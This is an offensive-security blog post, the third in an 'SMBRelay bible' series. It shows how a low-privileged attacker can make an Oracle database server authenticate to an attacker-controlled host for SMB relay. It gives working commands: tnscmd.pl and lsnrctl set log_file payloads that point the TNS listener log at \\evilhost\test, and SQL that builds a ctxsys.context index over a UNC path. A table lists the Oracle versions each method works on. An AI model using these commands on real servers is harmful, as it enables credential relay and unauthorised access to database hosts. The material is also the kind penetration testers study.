Close

HAVE QUESTIONS?

A partner account manager can help. Contact us today.

Subscribe me to your mailing list

SMBRelay bible 3. SMBRelay by Oracle

Like in the previous post, we'll talk about methods which need only non-privileged rights. Because we have too many ways for SMB Relay for privileged accounts, much depends from current situation and our rights.

Inro

Our next target is Oracle. Oracle is one of the most widespread RDBMS and many Enterprises use it as backend. We can find version from 8i to 11g in real life. Next information will be actually for each of them.

Runs as…

Oracle server service runs as ‘System' by default. But like MS SQL, it is very often occurs that the service runs as a domain/local user account by different reasons, for example when it is used as backend for SAP and other ERP systems.

Attack!!!

There are two ways for SMB relay attack realization. One of them doesn't need any privilege, another one needs CONNECT and RESOURCE privileges which can be found in any user.

1st method – TNS listener set_log.

"The Transparent Network Substrate (TNS) listener is a service which establishes and maintains connections with Oracle database services. When it receives a request from a client, the TNS listener establishes a connection between the client and server over a transparent network substrate, which allows communication regardless of the network protocol being used by either system."

We can use this method when we have ability for remote connection to TNS listener.

Before 10g TNS listener is not defended by password or ‘ADMIN_RESTRICTIONS' option by default. We should use ‘set_log' command for SMB relay.

The command ‘set_log' sets a way to TNS listener's log file. We can use either an original Oracle tool – ‘lsnrctl' or a Perl script – ‘tnscmd' to exploit this vulnerability.

Example with Perl script:

./tnscmd.pl -h victim.com --rawcmd "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=\\evilhost\test)))"

Example with LSNRCTL:

LSNRCTL>set log_file \\evilhost\test

Next connection to TNS-listener gives you necessary UNC-request for SMBrelay.

2nd method – ctxsys.context.

This method needs only ‘CONNECT' and ‘RESOURCE' roles for an attack which almost all users have. So you need to have at least one real user in RDBMS. We use creation of indexes by ctxsys.context to force UNC path request to our host.

There are three steps:

1) Create a special table:

SQL> CREATE TABLE files (id NUMBER PRIMARY KEY, path VARCHAR(255) UNIQUE, ot_format VARCHAR(6));

2) Insert the network path into the new table:

SQL> INSERT INTO files VALUES (1, "\\evilhost\test", NULL);

3) Create ctxsys.context index on path column:

SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context PARAMETERS ("datastore ctxsys.file_datastore format column ot_format");

And we successfully have SMBrelay.

Full description of this method you can see here: "Penetration from application down to OS (Oracle database)".

Here is the table showing which method can be used in different versions.

Table 1

Method 8i 9i 10g 11g User needs
set log file OK OK NO NO NO
ctxsys.context OK OK OK OK YES